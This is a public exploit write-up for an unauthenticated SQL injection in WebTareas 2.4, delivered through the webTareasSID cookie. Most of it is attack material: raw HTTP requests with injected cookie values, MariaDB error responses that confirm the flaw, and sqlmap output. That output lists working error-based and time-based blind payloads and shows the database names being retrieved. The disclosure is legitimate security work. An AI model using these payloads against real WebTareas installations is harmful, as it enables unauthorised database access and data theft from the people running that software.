WebTareas 2.4 SQL Injection

# Exploit Title: WebTareas 2.4 - SQL Injection (Unauthorised) # Date: 15/10/2022# Exploit Author: Hubert Wojciechowski# Contact Author: [email protected]# Vendor Homepage: https://sourceforge.net/projects/webtareas/# Software Link: https://sourceforge.net/projects/webtareas/# Version: 2.4# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23## Example -----------------------------------------------------------------------------------------------------------------------Param: webTareasSID in cookie-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/administration/admin.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/webtareas/general/login.php?msg=logoutConnection: closeCookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z''Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Sat, 15 Oct 2022 11:38:50 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: ../service_site/home.php?msg=permissiondeniedContent-Length: 0Connection: closeContent-Type: text/html; charset=UTF-8-----------------------------------------------------------------------------------------------------------------------Req-----------------------------------------------------------------------------------------------------------------------GET /webtareas/administration/admin.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: pl,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateReferer: http://127.0.0.1/webtareas/general/login.php?msg=logoutConnection: closeCookie: webTareasSID=Mt%ezS%00%07contCtxNzS%00%06_itemsVl%00%00%00%02S%00%03fooS%00%03barzzR%00%00%00%01Mt%001com.sun.org.apache.xpath.internal.objects.XStringS%00%05m_objS%00%04%eb%a7%a6%0f%1a%0bS%00%08m_parentNzR%00%00%00%12z'Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------------------------------------------------------------------------------------------------Res:-----------------------------------------------------------------------------------------------------------------------HTTP/1.1 302 FoundDate: Sat, 15 Oct 2022 11:38:39 GMTServer: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.30X-Powered-By: PHP/7.4.30Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheLocation: ../service_site/home.php?msg=permissiondeniedContent-Length: 355Connection: closeContent-Type: text/html; charset=UTF-8You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near 'javax.naming.spi.ContinuaS' at line 1(1064)<br /><b>Warning</b>:  Unknown: Failed to write session data using user defined save handler. (session.save_path: E:\xampp_php7\tmp) in <b>Unknown</b> on line <b>0</b><br />-----------------------------------------------------------------------------------------------------------------------SQLMap:-----------------------------------------------------------------------------------------------------------------------sqlmap resumed the following injection point(s) from stored session:---Parameter: Cookie #1* ((custom) HEADER)    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7431 FROM(SELECT COUNT(*),CONCAT(0x717a717071,(SELECT (ELT(7431=7431,1))),0x71716a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- wBnB; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: webTareasSID=Mt%00%00Mt%00%17com.caucho.naming.QNameS%00%08_contextMt%00' AND (SELECT 7004 FROM (SELECT(SLEEP(5)))BFRG)-- Oamh; qdPM8=grntkihirc9efukm73dpo1ktt5; PHPSESSID=nsv9pmko3u7rh0s37cd6vg2ko1    [11:49:03] [INFO] testing MySQL  [11:49:03] [INFO] confirming MySQL  do you want to URL encode cookie values (implementation specific)? [Y/n] Y  [11:49:03] [INFO] the back-end DBMS is MySQL  web application technology: PHP 7.4.30, Apache 2.4.54  back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)  [11:49:03] [INFO] fetching database names  [11:49:04] [INFO] starting 6 threads  [11:49:06] [INFO] retrieved: 'zxcv'  [11:49:06] [INFO] retrieved: 'information_schema'  [11:49:06] [INFO] retrieved: 'performance_schema'  [11:49:06] [INFO] retrieved: 'test'  [11:49:06] [INFO] retrieved: 'phpmyadmin'  [11:49:06] [INFO] retrieved: 'mysql'  available databases [6]:  [*] information_schema  [*] mysql  [*] performance_schema  [*] phpmyadmin  [*] test  [*] zxcv  [11:49:06] [INFO] fetched data logged to text files under 'C:\Users\48720\AppData\Local\sqlmap\output\127.0.0.1'  [11:49:06] [WARNING] your sqlmap version is outdated  [*] ending @ 11:49:06 /2022-10-15/